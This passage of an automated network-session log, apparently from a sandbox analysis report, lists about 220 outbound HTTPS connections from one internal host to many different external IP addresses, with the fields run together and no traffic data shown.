                                      14105192.168.2.14343581.37.98.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14106192.168.2.1449978143.15.185.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14107192.168.2.143341237.221.178.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14108192.168.2.1449422157.42.17.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14109192.168.2.1433732141.222.236.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14110192.168.2.1436738113.121.98.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14111192.168.2.144446432.23.111.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14112192.168.2.143314062.182.23.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14113192.168.2.143791448.19.190.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14114192.168.2.145295090.104.177.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14115192.168.2.1450582160.98.223.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14116192.168.2.1442884144.71.120.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14117192.168.2.145004614.240.192.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14118192.168.2.144140644.210.146.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14119192.168.2.144045272.39.11.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14120192.168.2.1440758194.59.98.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14121192.168.2.1445558193.26.219.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14122192.168.2.1452400133.173.64.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14123192.168.2.1457394159.78.12.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14124192.168.2.145392281.31.48.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14125192.168.2.143587088.199.223.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14126192.168.2.143703874.173.44.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14127192.168.2.1447864174.49.6.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14128192.168.2.1442558197.5.224.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14129192.168.2.143529079.24.0.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14130192.168.2.145364437.3.167.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14131192.168.2.1442312190.72.163.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14132192.168.2.1436410125.60.131.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14133192.168.2.1434824180.140.71.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14134192.168.2.1444928113.35.83.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14135192.168.2.1437608190.206.9.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14136192.168.2.1434394139.114.52.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14137192.168.2.1451498203.213.95.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14138192.168.2.143848253.198.204.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14139192.168.2.1444500123.14.6.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14140192.168.2.1435778152.119.245.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14141192.168.2.1442124116.108.47.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14142192.168.2.1452604108.177.20.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14143192.168.2.1438592182.56.64.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14144192.168.2.1459534100.253.203.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14145192.168.2.1442480208.188.167.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14146192.168.2.1458464110.45.42.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14147192.168.2.1445610170.36.100.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14148192.168.2.144110650.201.122.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14149192.168.2.1437104123.192.138.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14150192.168.2.143948439.53.31.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14151192.168.2.144541674.99.27.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14152192.168.2.1454108191.84.123.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14153192.168.2.144292224.81.135.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14154192.168.2.1453478104.109.129.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14155192.168.2.145588086.231.115.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14156192.168.2.1450278165.99.187.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14157192.168.2.143683041.234.175.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14158192.168.2.143377272.80.237.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14159192.168.2.1445312137.131.60.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14160192.168.2.1456206103.169.31.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14161192.168.2.1448036148.122.248.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14162192.168.2.144537049.215.189.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14163192.168.2.1457526117.117.144.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14164192.168.2.1437152206.245.194.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14165192.168.2.1447442133.202.14.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14166192.168.2.143873866.173.56.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14167192.168.2.143779248.56.184.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14168192.168.2.1438954104.69.216.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14169192.168.2.1457560178.98.208.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14170192.168.2.144891425.127.12.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14171192.168.2.144334839.135.233.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14172192.168.2.145035286.54.55.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14173192.168.2.143993231.75.29.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14174192.168.2.1451228173.247.83.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14175192.168.2.1448136120.185.76.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14176192.168.2.143336664.218.91.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14177192.168.2.1447724121.9.68.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14178192.168.2.143844298.154.227.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14179192.168.2.1433160164.45.37.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14180192.168.2.1443012207.160.155.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14181192.168.2.143825834.139.102.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14182192.168.2.1454352129.226.172.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14183192.168.2.1458366189.143.190.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14184192.168.2.143853819.153.40.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14185192.168.2.1447232159.141.132.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14186192.168.2.1439992121.33.3.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14187192.168.2.1446866163.237.9.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14188192.168.2.1455816152.240.33.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14189192.168.2.1443662189.42.76.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14190192.168.2.144036018.190.238.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14191192.168.2.145524823.254.114.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14192192.168.2.144062646.10.110.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14193192.168.2.145077040.89.147.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14194192.168.2.1438954181.61.209.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14195192.168.2.145238054.11.44.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14196192.168.2.1436192172.5.147.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14197192.168.2.143447687.162.180.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14198192.168.2.14604324.6.78.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14199192.168.2.1441708106.113.87.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14200192.168.2.143371485.237.61.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14201192.168.2.143519657.131.239.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14202192.168.2.145436269.63.51.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14203192.168.2.1459440211.132.95.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14204192.168.2.145972267.58.154.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14205192.168.2.144268819.212.102.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14206192.168.2.144481870.73.109.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14207192.168.2.1455662213.112.115.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14208192.168.2.145987024.112.54.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14209192.168.2.144955432.172.28.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14210192.168.2.144637873.208.25.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14211192.168.2.145988249.221.200.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14212192.168.2.1460650150.23.246.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14213192.168.2.1444190110.182.179.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14214192.168.2.1458164197.84.193.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14215192.168.2.145232496.35.23.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14216192.168.2.1449224126.112.229.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14217192.168.2.1450798106.47.244.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14218192.168.2.1457972120.72.1.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14219192.168.2.1460122187.27.101.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14220192.168.2.1442958143.254.36.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14221192.168.2.1445714154.20.0.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14222192.168.2.1460432209.44.133.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14223192.168.2.1442226191.254.98.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14224192.168.2.1457330131.219.121.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14225192.168.2.1434746158.156.233.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14226192.168.2.1446288144.80.23.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14227192.168.2.1448946210.44.30.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14228192.168.2.14554905.113.204.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14229192.168.2.1452920156.189.68.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14230192.168.2.143610461.149.106.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14231192.168.2.144491425.65.40.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14232192.168.2.1453270125.204.148.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14233192.168.2.145913470.113.124.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14234192.168.2.1449658103.228.172.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14235192.168.2.1450550130.241.122.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14236192.168.2.1447350114.19.199.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14237192.168.2.1449138150.83.73.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14238192.168.2.1455704132.170.58.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14239192.168.2.143455025.54.190.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14240192.168.2.1436354144.72.183.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14241192.168.2.144175434.238.2.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14242192.168.2.143814071.77.168.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14243192.168.2.143416827.57.198.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14244192.168.2.144718861.216.214.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14245192.168.2.143756083.167.7.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14246192.168.2.1442248189.144.131.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14247192.168.2.1442210163.196.198.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14248192.168.2.1432988198.237.22.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14249192.168.2.144371671.250.40.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14250192.168.2.145345085.192.147.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14251192.168.2.1449612219.2.93.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14252192.168.2.144737257.61.65.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14253192.168.2.144275279.242.235.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14254192.168.2.144749014.39.8.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14255192.168.2.145594095.187.133.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14256192.168.2.144988842.209.182.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14257192.168.2.1455766165.4.16.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14258192.168.2.1445344209.2.87.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14259192.168.2.1453526222.10.38.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14260192.168.2.143786068.79.8.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14261192.168.2.1446112120.193.250.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14262192.168.2.1436234111.126.72.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14263192.168.2.1449672205.122.125.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14264192.168.2.1439958210.249.96.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14265192.168.2.145059491.83.43.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14266192.168.2.1442770143.134.174.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14267192.168.2.1444272132.134.128.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14268192.168.2.1445680204.52.75.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14269192.168.2.143765819.144.37.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14270192.168.2.1458492112.96.55.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14271192.168.2.143372661.205.108.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14272192.168.2.1459024151.105.104.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14273192.168.2.1433294130.167.31.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14274192.168.2.1460524106.177.31.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14275192.168.2.1454408122.121.89.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14276192.168.2.1454124148.94.235.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14277192.168.2.144981680.89.147.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14278192.168.2.144998847.85.243.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14279192.168.2.1458624179.30.239.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14280192.168.2.145286051.86.94.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14281192.168.2.144331467.145.32.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14282192.168.2.1438390126.213.69.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14283192.168.2.144881418.48.186.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14284192.168.2.1457502158.41.192.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14285192.168.2.145870223.196.145.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14286192.168.2.144742860.204.249.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14287192.168.2.1448232208.221.145.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14288192.168.2.1450362177.48.173.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14289192.168.2.1436802108.116.235.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14290192.168.2.144558446.29.139.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14291192.168.2.1438240136.153.0.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14292192.168.2.1443366192.109.100.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14293192.168.2.1444388152.233.56.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14294192.168.2.1453928204.36.23.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14295192.168.2.1438560218.193.141.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14296192.168.2.1441022150.199.154.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14297192.168.2.1438690150.151.196.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14298192.168.2.143422840.106.217.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14299192.168.2.145116636.25.188.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14300192.168.2.1448142201.16.98.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14301192.168.2.14421181.117.37.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14302192.168.2.145972619.100.249.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14303192.168.2.1451618220.56.253.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14304192.168.2.1452104219.246.119.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14305192.168.2.1444054111.119.193.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14306192.168.2.1444268137.208.37.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14307192.168.2.143998298.178.183.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14308192.168.2.1457512195.213.166.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14309192.168.2.144903480.172.89.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14310192.168.2.145334099.253.146.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14311192.168.2.1445660152.22.115.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14312192.168.2.145560089.78.88.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14313192.168.2.144398827.244.58.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14314192.168.2.1460758120.38.168.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14315192.168.2.1439884204.146.169.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14316192.168.2.1443788119.86.204.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14317192.168.2.143366057.110.78.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14318192.168.2.1436914124.165.182.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14319192.168.2.1435850154.221.106.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14320192.168.2.146084261.225.177.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14321192.168.2.145692495.36.108.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14322192.168.2.1436818212.144.179.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14323192.168.2.145009493.205.194.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14324192.168.2.145958298.80.231.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14325192.168.2.144177086.48.127.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14326192.168.2.1439288172.245.90.112443
                                      TimestampBytes transferredDirectionData


